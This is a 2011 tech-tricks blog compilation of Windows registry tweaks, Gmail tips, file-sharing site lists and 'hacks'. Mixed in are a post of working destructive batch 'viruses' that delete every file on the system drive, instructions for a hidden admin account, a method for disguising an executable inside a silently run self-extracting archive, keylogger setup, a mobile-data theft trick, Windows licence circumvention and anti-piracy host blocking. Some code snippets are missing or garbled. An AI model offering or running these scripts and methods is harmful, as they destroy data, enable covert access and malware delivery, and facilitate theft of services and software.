Tuesday, May 31, 2011

Top Rapidshare Search engines

Their exist numerous services but here are the selected few top 10 services:
  1. Filez.com: Rapidshare Search - Note: Search Results Contains Adult Ads
  2. Rapidshare-Search-Engine.com
  3. Rapidshare1.com
  4. Rapidsharelink.com
  5. RapidFox.Com
  6. FilesTube.com
  7. Filesbot.com
  8. Hellafiles.com
  9. Searchshared.com - Supports almost all major one click file-hosters
  10. Oneclickfiles.com

+91 91777 50037

Friday, May 27, 2011

Add a Website link to Start menu

Add a Website link to Start menu: "This is a simple registry tweak which adds a website link to your Start Menu…..its very handy for quick access to your favourite website.

To Install : Copy the code below to notepad and save it as link.reg then just right click on it and choose “merge”.

Windows Registry Editor Version 5.00




To uninstall : Copy the code below to notepad and save as rem.reg and right click and choose merge.

Windows Registry Editor Version 5.00




Auto End Tasks to Enable a Proper Shutdown

Auto End Tasks to Enable a Proper Shutdown: "Auto End Tasks to Enable a Proper Shutdown
This reg file automatically ends tasks and timeouts that prevent programs from shutting down and clears the Paging File on Exit.

1. Copy the following (everything in the box) into notepad.

QUOTEWindows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]“ClearPageFileAtShutdown”=dword:00000001
[HKEY_USERS\.DEFAULT\Control Panel\Desktop]“AutoEndTasks”=”1″

2. Save the file as shutdown.reg3. Double click the file to import into your registry.

NOTE: If your anti-virus software warns you of a “malicious” script, this is normal if you have “Script Safe” or similar technology enabled."

Disable windows Logo key

Disable windows Logo key: "When I was recently playing games and this nasty windos logo key keep annoying me , cause I often accidently clicked it , and I start to search a solution to solve my problem, and found the following article in microsfot website, and it did work, hope this helps, thanks!


or in other articles, u can copy the following messages into ur notepad and save as *.reg, and use it..

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout]
“Scancode Map”=hex:00,00,00,00,00,00,00,00,03,00,00,00,00,00,5b,e0,00,00,5c,e0,\

Create Hidden Admin Account in XP

Create Hidden Admin Account in XP: "Create Hidden Admin Account in XP.
Since we are going to do all the Editing in Window Registry it is Recommended to Back Up the Registry before going Further.After you have Backed up your registry follow the Steps to Create your Hidden Account:* First Goto Start -> Run -> Type regedit -> Enter* In the Left Menu goto,
Winlogon\SpecialAccounts\UserList* In the Right pane, Right click -> New -> String Value

Right click on the new String Value and click Rename* Type the Name of the Account you want to hide.* Hit Enter then Right click on the String Value again and Change value to 0 which hides it. If you want it to be Visible to all Enter the Value 1.* Now Save and Exit the Registry and Logoff.* Goto welcome screen and Hit ctrl+alt+del twice to bring up Logon prompt* Type hidden Accounts name and password* Enjoy!!!"

Disable Autorun of Usb & Cd in XP

This is a very commom problem sometime.Some time we need to disable autorun of usb and cd drives.To disable autorun of usb and cd drives follow following steps:

Go to run and type gpedit.msc command

You will see the Group Policy window. Then select Administrative Templates \ System in the tree

You will see an item in the right side pane called “Turn off Autoplay”

Double click on that item, and set the radio button to Enabled, and change the “Turn off Autoplay on” to All Drives.

Now you have disable autorun of usb and cds on your windows
If you have problem check here

HOW TO Change Windows XP Home to Windows XP Pro

We can’t vouch for this hack, because we are too lazy to try it (and we never, ever violate copyrights or EULAs), but kind reader Martin explains the process for turning an Windows XP Home install disc to a Windows XP Pro disc after the jump.

It sounds pretty simple to do (just some registry changes), but you can’t install Service Pack 2, so you might try to slipstream in the changes to your modified install disc (if that’s even possible).

Alternately, buy XP Pro, or get a Mac.

yes indeed, you can’t change an installed Windows but only your Installation CD (or even a recovery CD in case the manufacturer had not left out important parts)

Here’s the detailed breakdown you asked for.

1. Copy the root directory and the i386 directory of the WindowsXP CD
to your harddisk
2. Extract the Bootsector of your WindowsXP CD
3. Change 2 Bytes in i386\Setupreg.hiv :
a) Open Regedit
c) Menu: File -> Load Structure -> i386\Setupreg.hiv
d) Assign an arbitrary name to the imported structure e.g. “Homekey”
e) Goto HKEY_LOCAL_MACHINE\Homekey\ControlSet001\Services\setupdd
f) edit the binary key “default” and change “01” to “00” and “02” to
g) Highlight “Homekey” and select menu: File -> unload structure
4. Burn your new XP Pro CD
5. Install WindowsXP as usual. Your XP Home Key will work.

Note: You cannot apply SP2 to such a WindowsXP Pro, so step 1.b)
might be to integrate SP2 in your Installation CD

Please check the menu-entries as I don’t owe an English copy of
XP and have to guess them.

simple virus in .bat

simple virus in .bat: "use these scripts on your own responsibility..

1.This Virus Deletes All The Content Of A Drive…

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat

2.The Most Simple Virus To Crush The Window

@Echo off
Del C:\ *.* y

Save It As Anything.bat

3.The below Code Will Just Restart Ur PC

@echo off shutdown -r -f -t 00

save as anyname.bat"

Change I.E title bar text

Change I.E title bar text: "Go to>Start

Path: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main.

Modify/Create the Value Name “Window Title” according to the Value Data listed below.
Data Type: REG_SZ [String Value]
Value Name: Window Title
Value Data: [Enter The Text Desired In Title Bar]
Exit Registry and Reboot"

How to make file undetectable

How to make file undetectable: "Use binding ,this is simple binding.In this tutorial you will see how to bind two files together using WinRAR.This is useful if you are sending a file and you want it to extract and run straight away.For this tutorial I will be using a simple .exe file (command[1].exe) and game.exe file

Step 1:Get the files you want to bind.

Step 2:Highlight them both and add to archive.

Step 3:Change the name and select “Create SFX archive”

Step 4:Go to the “Advanced” tab at the top and click on “SFX options”

Step 5:In the “General” tab type in the name of the file you want to run after the extraction.

Step 6:Go to the “Modes” tab and select “Hide all”

Step 7:Go to the “Text and icon” tab and change the icon to something other than the WinRAR icon

Step 8:Click “OK” on the advanced window and “OK” in the main window and it will create the file.

Now when the user clicks on it extracts and automatically runs command[1].exe
This can be used in a variety of ways, you can experiment with the options to get different results."

100 Great Gmail Hacks for Email Addicts

If you’re a Gmail user, you know that it’s a powerful email tool, even if you’re just using it for basic functions. However, there are so many options and hacks that you can take advantage of to take your email to the next level that it can be worth your while to learn a little bit more about what Gmail is really capable of doing. Read on tolearn about 100 ways to hack Gmail for the better.

Take these shortcuts to work in Gmail faster.

  1. Keyboard Shortcuts: These shortcuts will help you avoid having to use your mouse in Gmail.
  2. Use Quick Links: Quick Links can bookmark anything in Gmail to set up quick access.
  3. See shortcuts: Type “?” to get a shortcut popup.
  4. Set up custom shortcuts: You can set up custom keyboard shortcuts through Gmail’s settings.
  5. Use EOM: Type “EOM” or (EOM) in the subject line of a subject-only message, and Gmail won’t ask you if you want to add text to the body.
  6. Shift-click: You can select multiple messages using Shift-click.

Moving & Identity
Move over to Gmail and manage your identity using these hacks.

  1. Change your Gmail email ID: This hack will help you find a solution for changing your Gmail ID.
  2. Change your From and Reply to address: Tweak these settings to show the address you want.
  3. Import your email: You can import mail and contacts from other email providers, and even have messages forwarded.

These hacks will help make Gmail work for you.

  1. Set up repetitive emails: Set up AutoHotKey HotStrings to take care of repetitive email quickly.
  2. Check your POP3 More Often: With this hack, you’ll be able to have Gmail check your POP3 accounts often.
  3. Set Gmail as your default: Go into your settings to use Gmail for Mail To links.
  4. Save notes in your drafts: Keep notes handy by saving them in your drafts.
  5. Look at the title of your web browser: You can see the number of the new emails you have by looking at the title of your web browser.

These tools can ramp up your Gmail experience.

  1. Resizeable Textarea: This extension will allow you to change your text area without resizing your browser window.
  2. Better Gmail: Better Gmail adds features like hierarchical labels, unread messages, and more.
  3. GMAIL Backup Tool: Backup your Gmail with these tools.
  4. dragdropupload: With this add-on, you can drag and drop files directly to your Gmail.
  5. GTDInbox for Gmail: Use this extension to use Getting Things Done productivity.
  6. Greasemonkey: Make use of these Gmail scripts to make everything Gmail easier.

Put these hacks to work when writing emails.

  1. Drag and drop: You can drag and drop attachments instead of using the attach button.
  2. Change your default font and styling: This hack will allow you to change the default appearance of your emails.
  3. Add an HTML Signature: With this hack, you’ll be able to add an HTML signature to your email.
  4. Forward all: You can forward an entire conversation in a single email.
  5. Insert images: Share screenshots and other images with this hack.
  6. Create a mail merge: Use this hack for a mail merge in Gmail.
  7. Quote selected text: In a long thread, just pull out the text you really want to respond to.
  8. Use canned responses: Gmail has a new feature that allows you to save email templates and insert them right into your email.
  9. Quickly address Gmail users: Send an email to another Gmail user just by entering their username.
  10. Go offline: Take Gmail offline with Labs.
  11. Send email from your phone: Gmail has a free IMAP sync with your phone’s email client.

Time Savers
With these hacks, you’ll save time in Gmail.

  1. Preview attachments: Make sure you actually need to download a file by previewing them first.
  2. See which emails are sent to you: With personal level indicators, you can find out if an email was sent to you directly.
  3. Right click to read: Preview any email just by right clicking on it.
  4. Mark unread from here: Mark messages unread from a certain point using this feature.
  5. Convert to HTML: You can convert PDF, Word and more to HTML just by sending them as an attachment.
  6. Download all of your attachments: Use this hack to download every attachment from Gmail.
  7. Add multiple attachments to an email: Hold down your Ctrl key or Shift to add a group of attachments to your email.

These hacks will help you use Gmail as storage.

  1. Scan your manuals: Create PDFs of your manuals and email them to yourself.
  2. Mail yourself disallowed files: Certain files are not allowed to be mailed, but you can save them in your drafts folder.
  3. Backup your messages: You can forward email to a different address just in case.
  4. Use Gmail for MP3 or Storage: Here you’ll find out how to use GMail to store your MP3 files and play them.

You can keep Gmail well organized with these hacks.

  1. Clean up by moving emails: Clean your inbox using Move to like folders.
  2. Create aliases: You can create an infinite number of + aliases for Gmail.
  3. Merge contacts: Use this hack to merge all of your duplicate email contacts.
  4. Prefix labels: Use unique characters to bring labels up to the top of alphabetized lists.
  5. Use Superstars: Choose between several star icons to flag your messages.
  6. Sort by unread: Type “in:inbox is:unread” to filter all unread messages.
  7. Create filters: Filter emails so you don’t have to move them to folders later.
  8. Archive: Tidy up your inbox and put old email into storage using archiving.
  9. Use stars: Indicate special emails with the help of stars.
  10. Manage all your email accounts: Use Gmail to manage all of your accounts at once.
  11. Use labels: Scan your inbox quickly using labels.

Read more from here


Orkut Album Hack Save Picture in orkut

Orkut Album Hack Download Picture in orkut

Many time we like to download pictures from our friends album but orkut has disable right click on their album so we cannot download their pictures from albums.Here is simple by which you can download pictures from your friends album.

Method 1

1. Open Orkut using Firefox

2.Then go to tools ,Next open page info

3.Click on the media option

4.You can see a list of pictures found in that page and there will be a preview option in it using it select the picture, Click on save.You image will be save.
For next picture, repeat from the first step

Method 2

This is very simple open your friend album and picture that you want to save on your hard disk.Click on that image and drag it to you desktop.You image will be save their.

How to Skip Bypass CAPTCHA Verification

How to Skip Bypass CAPTCHA Verification: "How to Remove Bypass CAPTCHA Verification

If you don’t know what Captcha is ,It is an acronym for “Completely Automated Public Turing test to tell Computers and Humans Apart”. Entering Captcha is very annoying for everyone.It used to safe from bots and spammers.You can Bypass captcha in many waysThere are various firefox Plugins which can be used for bypass procees.Check this out


skips unnecessary pages on sites like Rapidshare, Megaupload, zShare, Mediafire, and more. Try it out, or watch a demo at skipscreen.com.SkipScreen will be tenaciously maintained and improving all the time. Why click through ad-laden pages and wait for countdowns when your computer can do it for you?

Supported sites:

many more…

Download it from here


Google Page Rank Update

Google Page Rank Update: "Google Page Rank Update

Google has update page rank of various websites across the web .My site hackingtrick.com has got page rank of 2.Its a good page rank update for me.Next time i will try to get page rank of 3..If you dont know what is page rank for Google click below link.


Hope this increase in page rank could also help in increase in traffic for me."

Google Online Programming Contest Earn by programming

Google Online Programming Contest Earn by programming: "Google Code Jam 2010

Do you enjoy solving tough problems and grappling with technical challenges? Then enter Google Code Jam!
Google Code Jam is a programming competition in which professional and student programmers are asked to solve complex algorithmic challenges in a limited amount of time. The contest is all-inclusive: Google Code Jam lets you compete in the programming language and development environment of your choice.


Top 25 finalists will divide over $10,000 in prize money.

1st place $5,000

2nd place $2,000

3rd place $1,000

4th – 25th place $100

you can get more information from here


Sachin Tendulkar Joins Twitter Account

Sachin Tendulkar Joins Twitter Account: "Sachin Tendulkar Joins Twitter Account

After long time world best cricket player has join twitter.Twitter is the famous social networking and micro blogging website.Sachin Tendulkar follower are increasing very fast let see can he break world record of most followers or not.At the time of this post sachin is having 1 lakh follower in his account.

click below and follow sachin on twitter


Display legal notice on startup:

Display legal notice on startup:: "Open REGEDIT browse to..

“legalnoticecaption”=”enter your notice caption“
“legalnoticetext”=”enter your legal notice text“

change the values written in italic.."

C-program to print map of India

C-program to print map of India: "#include “Stdio.h” main() { int a,b,c; int count = 1; for (b=c=10;a=”- FIGURE?, UMKC,XYZHello Folks,\ TFy!QJu ROo TNn(ROo)SLq SLq ULo+\ UHs UJq TNn*RPn/QPbEWS_JSWQAIJO^\ NBELPeHBFHT}TnALVlBLOFAkHFOuFETp\ HCStHAUFAgcEAelclcn^r^r\\tZvYxXy\ T|S~Pn SPm SOn TNn ULo0ULo#ULo-W\ Hq!WFs XDt!” [b+++21]; ) for(; a– > 64 ; ) putchar ( ++c==’Z’ ? c = c/ 9:33^b&1); return 0; }"

Mac Address Changer

Mac Address Changer: "In computer networking, a Mac Address is a Media Access Control address (MAC address) is a unique identifier assigned to most network adapters or network interface cards (NICs) by the manufacturer for identification, and used in the Media Access Control protocol sub-layer. If assigned by the manufacturer, a MAC address usually encodes the manufacturer’s registered identification number. It may also be known as an Ethernet Hardware Address (EHA), hardware address, adapter address, or physical address.
Whenever you are trying to do something wrong thing like hacking then you must first change mac address your computer or pc.There is a software available which can be used for changing mac address.

SMAC MAC Address Changer 2.0.5

SMAC is a powerful, yet easy to use MAC address changer for Windows systems, regardless of whether the manufacturers allow this option or not. The new MAC addresses you change will sustain from reboots. Features: change MAC address in 3 clicks, validate MAC address, generate random MAC address, view MAC address, IPConfig button, view complete network adapter information, load MAC address list, show MAC change history, show manufacturer of MAC address. Version 2.0.5 includes unspecified updates.

Download From here


How to shutdown computer with Timer

How to shutdown computer with Timer: "Here is another trick to shutdown at a specific time, for example you wish to shutdown at 3:45am then do this….
Type this in
TYPE Code: at 3:45 shutdown -s
[Time should put when you want to shutdown your pc]
Type Code: shutdown -a

you can play with your friends with this…"

Disabling Drives in My Computer :

Disabling Drives in My Computer :: "To turn off the display of local or networked drives when you click on My Computer:
1.Open RegEdit
2.Go to
HKEY_CURRENT_USER\Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer
3.Add a New DWORD item and name it NoDrives
4.Give it a value of 3FFFFFF
5.Now when you click on My Computer, none of your drives will show."

Hack Airtel for Free Airtel GPRS

Hack Airtel for Free Airtel GPRS: "Hack Airtel for Free Airtel GPRS

Airtel hacks to enjoy free Airtel GPRS. Airtel hack for free Airtel GPRS. I have provided link from where you can get it

Note 1: For this Airtel hack to work, maintain your balance below 30p after first time installation. If your balance is above 30p, don’t exit from the Airtel free GPRS browser to avoid balance curtailment.

Note 2: To make this airtel GPRS hack work for you, you should have “Zero Rental Mobile Office” (30p/50KB) activated. To activate, simply dial *567# and select Internet Activation.

The method of hacking airtel gprs you can get from below link

Original hack post here


I don’t know this airtel gprs hacking trick work or not please check and comment"

Ntoskrnl.exe Missing or Corrupt in Windows XP

Ntoskrnl.exe Missing or Corrupt in Windows XP: "Ntoskrnl.exe Missing or Corrupt XP

Try the following method to fix this ntoskrnl.exe problem.Hope this will fix your problem

1.Start the computer by using your Windows XP CD-ROM. Press any key to boot from the CD.

2.After the setup files are finished loading press R to repair using Recovery Console.

3.When you are in the recovery console, select the installation to log on to (usually number 1), and then press ENTER.

4.Login to the Administrator account by typing the password for this account, and then press ENTER.

5.At the recovery console command prompt, type the following command, and then press ENTER:

For Uni-Processor systems:
expand :\i386\ntoskrnl.ex_ :\Windows\system32\ntoskrnl.exe For Multi-Processor systems:
expand :\i386\ntkrnlmp.ex_ :\Windows\system32\ntoskrnl.exe Note In these two commands, the placeholder represents the drive letter of your CD drive, and the placeholder represents the drive letter of the hard disk on which windows is installed.

6.If you receive a prompt to overwrite the file, press Y.

7.Type exit, and press ENTER at the command prompt.

This method from microsoft support .If this does not work check the following help link


Task Manager Disabled by Administrator Problem Solution

Task Manager Disabled by Administrator Problem Solution: "Task Manager Disabled by Administrator

This is a very big problem problem which many people face when they are caught by any virus or worms.You can enable your task manager by following ways

Method 1: Change Task Manager through a Registry REG file

1.Click on Start, Run, and type Notepad and press Enter

2.Copy and paste the information between the dotted lines into Notepad and save it to your desktop as taskmanagerenable.reg


3. Double click on the taskmanager.reg file to edit the Windows registry

Method 2

1.Click on Start, Run, and type REGEDIT and press Enter

2.Navigate to the following branch tree

HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies\ System

3.In the right pane,if find the value named DisableTaskMgr delete it

If these method does not enable task manager on your system then try following link


Change the Default Location for Installing Programs

Change the Default Location for Installing Programs: "Change the Default Location for Installing Programs

AS you know XP uses the C:\Program Files directory as the default base directory into which new programs are installed. However, you can change the default installation drive and/or directory by using a Registry hack. Run the Registry Editor and go to
Look for the value named ProgramFilesDir.
By default, the value will be C:\Program Files.
Edit the value to any valid drive or folder;
Now XP will use that new location as the default installation directory for new programs.This registry hack can be very useful when your c drive is full and you automatically want to change the installing directory.Enjoy this cool windows registry hack"

How to Disable XP VISTA shutdown

How to Disable XP VISTA shutdown: "How to Disable XP VISTA shutdown

You can play this prank on your friend computer disable his shutdon option.Its very easy you have to use registry trick and tips.
You can use a Registry hack to disable the normal Shut Down. Run the Registry Editor and go to


Create a new DWORD value named NoClose with a data value of 1.

Exit the Registry and reboot in order for the change to take effect.

You won’t be able to shut down Windows in the normal manner from now on; you’ll have to run Task Manager by pressing Ctrl-Alt-Delete or right-clicking on the Toolbar, choosing Task Manager, and then using the Task Manager’s Shut Down menu to close Windows. If you want to reenable normal shutdowns, delete the NoClose value."

How to Control Move Mouse Pointer with Keyboard?

How to Control move Mouse Pointer from Keyboard

You can try this method if you are bore of using your mouse in normal way.You can control your mouse pointer with keyboard keys in all windows . When your mouse stops working, you can enable this keyboard feature to complete your important work. This keyboard mouse can perform all tasks which are same as of normal mouse.

Follow the given steps to activate the keyboard mouse:

1. log into your computer with administrative rights.

2. To activate this feature, press left Alt+left Shift+NumLock keys at once and you will receive a small MouseKey box.

3. To keep MouseKeys on, click on Ok button or click on cancel button to cancel MouseKeys box.

4. Click on Settings button, if you want to adjust the mouse cursor detail settings.

5. A new dialog box will appear with “Settings for MouseKeys”, now you can do all mouse settings ,for example mouse cursor speed, acceleration and some other features.

6. Now using Numeric keypad, you can move your mouse pointer where you want to move on desktop

The controls are:

1,2,3,4,6,7,8 and 9 keys are used to move the mouse cursor into different directions on desktop
Key 5 is used as mouse click button.
Insert key used to hold down mouse button.
+ Sign used to double click on any object.
Delete button used to release the mouse.

You can disable this feature by Click on NumLock button
Enjoy this feature

How to Enable Hibernate in Windows XP Vista

Hibernate is very cool feature.In windows environment, the hibernation is a built-in feature used to increases your work performance and also minimizes the windows startup time. For example, if you have to keep open a lot of files and windows applications then you can leave you system in hibernate mode without closing the open programs. When you restart computer after hibernation, all the running files and applications will be restore as you have left them. Windows store the all hibernated information in the Hiberfil.sys file using system root folder. The size of this file is roughly equal to the RAM of your system.

Follow the given steps to activate the hibernation in windows XP:

1.To use this feature, you will need to be logged into your computer with administrative rights.

2.First click on Start button> Control Panel, click on Performance and Maintenance then click on Power Options.

3.A new “Power Options Properties” dialog box will appear

4.Select Hibernate tab and then select the “Enable hibernation” check box to enable the hibernate feature.

If you system does not support the hibernation feature then the hibernation tab will not available .Click on Apply button to the changes then click on Ok button to end the configuration process. After enabling the hibernation feature click on Start button then click on “Turn off Computer”. In the “Turn off Computer” dialog box, press the “Shift” for some time and click on Hibernate button. Your system will take some time to complete the hibernation process

How to Change Windows 7 Logon Screen ?

How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background. Changing logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Well here is a step by step instruction to customize the

logon screen background.

1. The image you need to set as the background should be a .jpg file and it’s size should not exceed 245KB.

2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or1024 x 768. You can use any of the photo editing software such as Photoshop to compress and set the resolution for your
image. Once you’re done, save this image as backgroundDefault.jpg.

3. You will need to copy this image to

You will need to create that path if it does not already exist on your computer.

4. Now open the Registry Editor (Start -> Run -> Type regedit) and
navigate to the following key

If Background does not exist rightclick LogonUI, select New and then Key, and then name it Background. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background and
select New and then DWORD and name it OEMBackground.

5. Double-click on OEMBackground and set the Value Data to 1.

6. Now log-off to see the new logon screen background. If you would like to revert back to the default background, just set the Value Data back to 0.

I hope you like this trick. Just try out and give your feedback!

Google Search Tricks New

Google Search Tricks New: "you know about the unofficial Google shell.This a site which let you to search google in new way.If you have some experience with linux and unix you will love it.This is a google-interface behaves similar to a unix-shell.You type commands and the results are shown on this page.

goosh is written by Stefan Grothkopp

This is NOT an official google product!
Goosh is open source under the Artistic License/GPL.

Click here to check this



How to Use God Mode in Windows 7 ?

How to Use God Mode in Windows 7 ?: "How to Use God Mode in Windows 7

Windows 7 is now becoming popular among windows operating system users.Windows 7 has cool hidden feature ,people calls it godmode in windows 7.GodMode is a folder that brings together a long list of customization settings allowing you to change all your settings from one place.This is very good as you can now change all your windows settings from one single place.

God Mode in Windows 7
Foll the following steps to create god mode folder:

1. Create a new folder

2. Rename the folder to GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

You can change word GodMode to any other word you like your name or your friends name

3.The folder icon will change ,then double click it to show the GodMode windows options."

Edit Hosts File in Windows 7 XP to Block Websites

Blocking Websites With the Hosts File

A lot of software cracks will usually allow you to run an application which edits your hosts file, usually in an effort to block your computer from accessing the software’s registry server. However, many of these hosts-patching programs have problems or downright fail at editing the hosts file for certain Windows operating systems. The good news is you can patch the hosts file yourself, as long as you know the URL of the site you wish to block or redirect.

Editing the Hosts File (Windows 7)

  1. Click on the Start (Windows) button
  2. Click on Computer
  3. Navigate through Windows Explorer through the following folders:
    1. C:/
    2. Windows/
    3. System32/
    4. drivers/
    5. etc
  4. In “etc” folder, select the hosts file and copy and paste it to your desktop.
  5. Double click on the hosts file in your desktop
    1. Select to open it through Notepad
  6. Make edits to it in Notepad
  7. Save using Ctrl+S
  8. Drag and drop the hosts file back into the “etc” folder
  9. Select “move and replace file” to overwrite the original file

Your hosts file should look something like this:

Edit Hosts File in Windows 7 XP

Blocking Websites

To block a website, you simply add the following to the bottom of the hosts file in Notepad: siteyouwantblocked.com

So if I wanted to block MySpace, I would type: myspace.com
And then I would get this if I typed myspace.com into a browser:

Edit Hosts File in Windows 7 XP

It will not load the page until I change the hosts file. A lot of people who pirate Adobe software will patch the host file in this same fashion, typing: activate.adobe.com

You can patch your hosts file for entirely legal reasons too. Many people will edit their hosts file to block bad or unwanted websites that could harm their computer. In fact,here is a long, extensive list of bad websites that are already prepped to be blocked in your hosts file. Simply download the text document, copy the blocking website codes, and paste it into your hosts file.

However, be sure, if using one of these lists of designed to patch your host file, that all the websites are preceded with the code: That’s an IP address that defaults to nowhere. Just a blank page. If there is any other IP address in the code, don’t trust it. It could be redirecting you to bad sites filled with viruses and terrible things for your computer.

Mariana Ashley is a freelance writer who particularly enjoys writing about best online colleges. She loves receiving reader feedback, which can be directed to mariana.ashley031 @gmail.com.

Monday, May 16, 2011

Login as root in terminal of Linux

to use admin privileges in linux terminal..
enter the following command... 

sudo su

open root terminal
in accessories menu.. 

+91 91777 50037

keylogger for ubuntu

Yes there is a keylogger for ubuntu..

You can download it from here

Or you install it via apt-get

Enable universe repositories,and then run the following in terminal

sudo aptitude update sudo aptitude install lkl 

To run,type the following in terminal

lkl -l -k us_km -o log.file 

for seeing results

tail log.file 

+91 91777 50037

Monday, May 9, 2011

6 Online Instant File Sharing Sites You’ve Never Heard Of

It's almost become a cliche in the world of web apps: sites that allow you to share large files in just a few clicks. This isn't a bad thing, though; you never know when a particular service might not be offered anymore. You also may find services you like better than others; whatever your reason, it never hurts to explore your options.

That's why I highly recommend you check out 3 superb ways to share files. This service outlines Crate, ge.tt, and min.us, three great ways to share files. It's also worth reading our unofficial Dropbox manual, if you want to do some serious file sharing.

If that file sharing site doesn't cut it though, keep reading to discover some more great tools for the job. All of these programs don't require  registration, work on any Internet-connected computer regardless of operating system, and need only a browser to function properly. Best of all: they're free.


file sharing sites

Upload your file; share a public link. Featuring password protection and pretty fast transfer speeds, FilesOverMiles is a decent first choice. There is a catch, though: your file is never uploaded to a server. This means FilesOverMiles stops serving the file as soon as you close the webpage, so it may serve better for instant messaging conversations than for emails.

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file sharing websites

Another service you need to keep open in order for a download to work, Pipebytes connects your computer directly with that of the person who needs a given file. Choose the file you're sending; give a simple URL to your friend. It's a useful service that does its job.


file sharing websites

You guessed it: this client connects you directly with another computer. The real advantage this file sharing site has over the others named thus far is its clean interface, though even that is a slight edge at best. Links generated by this site are single-use only, meaning you shouldn't bother sending them to more than one person.


Want a link that lasts longer than your browser session? Good thing you found Dropdo. This web app not only stores uploaded files on its server, it serves up a handy file preview for most document formats. Behold:

file sharing websites

The entire document can be viewed without the necessity to download, and without a username or password. This is the perfect way to share files with family lacking in tech skills. Some people may have understandable privacy concerns, but if what you're sharing is fairly public, I'd say give this a go.


Sure, there's a 100MB limit, but Senduit is not without its advantages. For one thing, you can set its files to self destruct, spy style:

top file sharing

This is great if you've got a document you want to share, but would rather not keep on the Internet for an extended period of time. Also, this service's links do not expire if you close your browser. Again, there are privacy implications to this, but to me the self-destruct features help make up for this.


Yet another tool for the job, Large Document sports a flash interface, so Mac and Linux users may experience some instability. Having said that, it works really well for Windows users if your Flash is up to date.

file sharing sites

It's worth noting that Large Document also offers nifty instructions for integrating with Gmail. This is perfect for those moments when Gmail tells you a file is too big!


As I said, there are many different services to share files without signing up. This article just highlights a few more.

I'm interested in the file sharing sites you know about. Know of some services we've missed? Share them below; you just might find them featured later on this year. Also feel free to recommend services among those listed, because your experience is valuable input for the rest of us!

+91 91777 50037